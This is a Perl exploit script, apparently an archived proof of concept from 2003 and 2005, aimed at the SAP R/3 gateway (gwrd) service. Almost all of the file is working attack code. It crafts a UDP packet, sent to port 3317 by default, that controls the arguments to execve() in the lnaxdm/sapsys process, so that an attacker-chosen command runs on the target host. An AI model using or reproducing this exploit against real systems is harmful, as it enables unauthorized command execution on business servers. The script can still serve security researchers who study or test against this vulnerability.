r3mote_unix_UDPexec.pl.txt

`#!/usr/bin/perl -w  
use IO::Socket;  
  
# Unix version of the FX SAP R/3 gwrd vuln.  
#  
# We partially control a call to excve() made by lnaxdm/sapsys  
# Easily exploitable with local access  
# Could be done remotely under some conditions  
#  
# 2003, FX of Phenoelit <[email protected]> (Win32 original code)  
# 2005, Nicob <[email protected]> (Unix version)  
#  
  
$|=1;  
  
die "Give filename" unless ($command=shift);  
die "Give arg1" unless ($param1=shift);  
die "Give arg3" unless ($param3=shift);  
die "Arg1 too long" if (length($param1) > 8);  
die "Arg3 too long" if (length($param3) > 8);  
die "Give host" unless ($host=shift);  
  
$port="3317" unless ($port=shift);  
  
$request =   
"\x01".  
"\x02".  
"BBBBBBBBBB".  
"BBBBBBBBBB".  
"BBBBBBBBBB".  
"BBBBBBBBBB".  
"BBBBBBBBBB".  
  
# Second arg to execve()  
# 8 chars long  
$param1.  
" " x (8 - length($param1)).  
  
"_0_0_0_0_0_".  
  
# Fourth arg to execve()  
# 8 chars long  
$param3.  
" " x (8 - length($param3)).  
  
"_1_1_1_1_1__2_2_2_2_2".  
  
# First arg to execve()  
# Unlimted length, end with %00  
$command."\x00";  
  
&send_UDP($host,$port);  
  
exit 0;  
  
sub send_UDP {  
my $remote;  
my $rline;  
my $dest;  
my $port;  
  
($dest,$port) = @_;  
  
$remote =  
IO::Socket::INET->new(Proto=>"udp",PeerAddr=>$dest,PeerPort=>"$port",);  
unless ($remote) { die "cannot get socket for $dest" }  
$remote->autoflush(1);  
print $remote $request;  
  
close $remote;  
}  
`